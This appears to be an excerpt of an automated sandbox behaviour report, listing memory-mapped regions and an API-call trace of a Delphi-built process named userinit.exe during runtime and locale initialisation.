id = 6057
start_va = 0x2630000
end_va = 0x2736fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6058
start_va = 0x2740000
end_va = 0x2848fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 6059
start_va = 0x2630000
end_va = 0x273afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6060
start_va = 0x2740000
end_va = 0x284cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 6061
start_va = 0x2630000
end_va = 0x273ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6062
start_va = 0x2850000
end_va = 0x2962fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 6063
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 6064
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 6065
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 6066
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 6067
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 6068
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 6069
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 6070
start_va = 0x3e0000
end_va = 0x3e0fff
entry_point = 0x3e0000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 6071
start_va = 0x2970000
end_va = 0x2a6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002970000"
filename = ""
Region:
id = 6072
start_va = 0x3f0000
end_va = 0x3f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 6073
start_va = 0x6d800000
end_va = 0x6d818fff
entry_point = 0x6d800000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 6074
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 6075
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 6076
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 6077
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 6078
start_va = 0x2b70000
end_va = 0x2c6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b70000"
filename = ""
Region:
id = 6079
start_va = 0x2cd0000
end_va = 0x2d0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002cd0000"
filename = ""
Region:
id = 6080
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 6081
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 6082
start_va = 0x2d10000
end_va = 0x2fdefff
entry_point = 0x2d10000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 6083
start_va = 0x680000
end_va = 0x681fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000680000"
filename = ""
Region:
id = 6084
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 6085
start_va = 0x690000
end_va = 0x690fff
entry_point = 0x690000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 6086
start_va = 0x8a0000
end_va = 0x8a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008a0000"
filename = ""
Region:
id = 6087
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 6088
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 6089
start_va = 0x690000
end_va = 0x690fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Region:
id = 6090
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 6091
start_va = 0x8b0000
end_va = 0x8dbfff
entry_point = 0x8b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 6092
start_va = 0x8e0000
end_va = 0x8e7fff
entry_point = 0x8e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 6093
start_va = 0x8f0000
end_va = 0x8fffff
entry_point = 0x8f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 6094
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 6095
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 6096
start_va = 0x2a70000
end_va = 0x2b2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a70000"
filename = ""
Region:
id = 6097
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 6098
start_va = 0x2fe0000
end_va = 0x31fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fe0000"
filename = ""
Region:
id = 6099
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 6100
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 6101
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 6102
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 6103
start_va = 0x2fe0000
end_va = 0x309ffff
entry_point = 0x2fe0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 6104
start_va = 0x31c0000
end_va = 0x31fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031c0000"
filename = ""
Thread:
id = 296
os_tid = 0x810
[0188.680] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0188.680] GetKeyboardType (nTypeFlag=0) returned 4
[0188.680] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0188.680] GetStartupInfoA (in: lpStartupInfo=0x8f704 | out: lpStartupInfo=0x8f704*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0188.680] GetVersion () returned 0x1db10106
[0188.680] GetVersion () returned 0x1db10106
[0188.680] GetCurrentThreadId () returned 0x810
[0188.680] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x8f200, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0188.680] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8f0db, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0188.680] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f1f0 | out: phkResult=0x8f1f0*=0x0) returned 0x2
[0188.680] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f1f0 | out: phkResult=0x8f1f0*=0x0) returned 0x2
[0188.680] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x8f1f0 | out: phkResult=0x8f1f0*=0x0) returned 0x2
[0188.680] lstrcpynA (in: lpString1=0x8f0db, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0188.680] GetThreadLocale () returned 0x409
[0188.681] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x8f1eb, cchData=5 | out: lpLCData="ENU") returned 4
[0188.681] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0188.681] lstrcpynA (in: lpString1=0x8f0f8, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0188.681] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0188.681] lstrcpynA (in: lpString1=0x8f0f8, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0188.681] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0188.682] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0188.682] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x153640
[0188.682] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000
[0188.682] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x154640
[0188.682] VirtualAlloc (lpAddress=0x580000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000
[0188.682] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0188.682] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0188.682] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0188.682] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0188.682] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x8f324, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x8f310, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0188.683] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x8f310, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0188.683] GetVersionExA (in: lpVersionInformation=0x8f6a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x8f6a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0188.683] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0188.683] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0188.683] GetThreadLocale () returned 0x409
[0188.683] GetThreadLocale () returned 0x409
[0188.683] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x8f580, cchData=256 | out: lpLCData="Jan") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x8f580, cchData=256 | out: lpLCData="January") returned 8
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x8f580, cchData=256 | out: lpLCData="Feb") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x8f580, cchData=256 | out: lpLCData="February") returned 9
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x8f580, cchData=256 | out: lpLCData="Mar") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x8f580, cchData=256 | out: lpLCData="March") returned 6
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x8f580, cchData=256 | out: lpLCData="Apr") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x8f580, cchData=256 | out: lpLCData="April") returned 6
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x8f580, cchData=256 | out: lpLCData="May") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x8f580, cchData=256 | out: lpLCData="May") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x8f580, cchData=256 | out: lpLCData="Jun") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x8f580, cchData=256 | out: lpLCData="June") returned 5
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x8f580, cchData=256 | out: lpLCData="Jul") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x8f580, cchData=256 | out: lpLCData="July") returned 5
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x8f580, cchData=256 | out: lpLCData="Aug") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x8f580, cchData=256 | out: lpLCData="August") returned 7
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x8f580, cchData=256 | out: lpLCData="Sep") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x8f580, cchData=256 | out: lpLCData="September") returned 10
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x8f580, cchData=256 | out: lpLCData="Oct") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x8f580, cchData=256 | out: lpLCData="October") returned 8
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x8f580, cchData=256 | out: lpLCData="Nov") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x8f580, cchData=256 | out: lpLCData="November") returned 9
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x8f580, cchData=256 | out: lpLCData="Dec") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x8f580, cchData=256 | out: lpLCData="December") returned 9
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x8f580, cchData=256 | out: lpLCData="Sun") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x8f580, cchData=256 | out: lpLCData="Sunday") returned 7
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x8f580, cchData=256 | out: lpLCData="Mon") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x8f580, cchData=256 | out: lpLCData="Monday") returned 7
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x8f580, cchData=256 | out: lpLCData="Tue") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x8f580, cchData=256 | out: lpLCData="Tuesday") returned 8
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x8f580, cchData=256 | out: lpLCData="Wed") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x8f580, cchData=256 | out: lpLCData="Wednesday") returned 10
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x8f580, cchData=256 | out: lpLCData="Thu") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x8f580, cchData=256 | out: lpLCData="Thursday") returned 9
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x8f580, cchData=256 | out: lpLCData="Fri") returned 4
[0188.684] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x8f580, cchData=256 | out: lpLCData="Friday") returned 7
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x8f580, cchData=256 | out: lpLCData="Sat") returned 4
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x8f580, cchData=256 | out: lpLCData="Saturday") returned 9
[0188.685] GetThreadLocale () returned 0x409
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="$") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="0") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="0") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x8f6d4, cchData=2 | out: lpLCData=",") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x8f6d4, cchData=2 | out: lpLCData=".") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="2") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x8f6d4, cchData=2 | out: lpLCData="/") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0188.685] GetThreadLocale () returned 0x409
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x8f5a8, cchData=256 | out: lpLCData="1") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0188.685] GetThreadLocale () returned 0x409
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x8f5a8, cchData=256 | out: lpLCData="1") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x8f6d4, cchData=2 | out: lpLCData=":") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="AM") returned 3
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="PM") returned 3
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="0") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="0") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x8f5dc, cchData=256 | out: lpLCData="0") returned 2
[0188.685] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x8f6d4, cchData=2 | out: lpLCData=",") returned 2
[0188.685] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0188.686] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0188.687] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0188.687] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
